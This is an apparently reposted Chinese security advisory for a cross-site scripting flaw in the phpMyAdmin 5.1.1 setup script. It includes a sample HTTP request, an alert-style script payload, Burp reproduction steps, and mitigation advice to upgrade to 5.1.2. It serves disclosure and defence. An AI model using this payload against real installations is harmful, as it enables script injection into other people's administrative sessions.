描述:
已发现一系列弱点,可能允许攻击者将恶意代码注入设置脚本的各个方面,从而允许 XSS 或 HTML 注入。
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
有效载荷:
">'><script>alert(document.domain)</script>
重现步骤 :
-
在 burp 中捕获上面的 reuqest。
-
使用易受攻击的参数替换/更改 XSS 负载。
-
单击发送并在浏览器中显示响应。
-
你会得到弹出窗口!
缓解:
带有配置文件 config.inc.php 的 phpMyAdmin 安装将不允许访问安装脚本,从而减轻这种攻击。
升级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。
原文始发于微信公众号(Khan安全攻防实验室):PhpMyAdmin 5.1.1 - XSS(跨站点脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论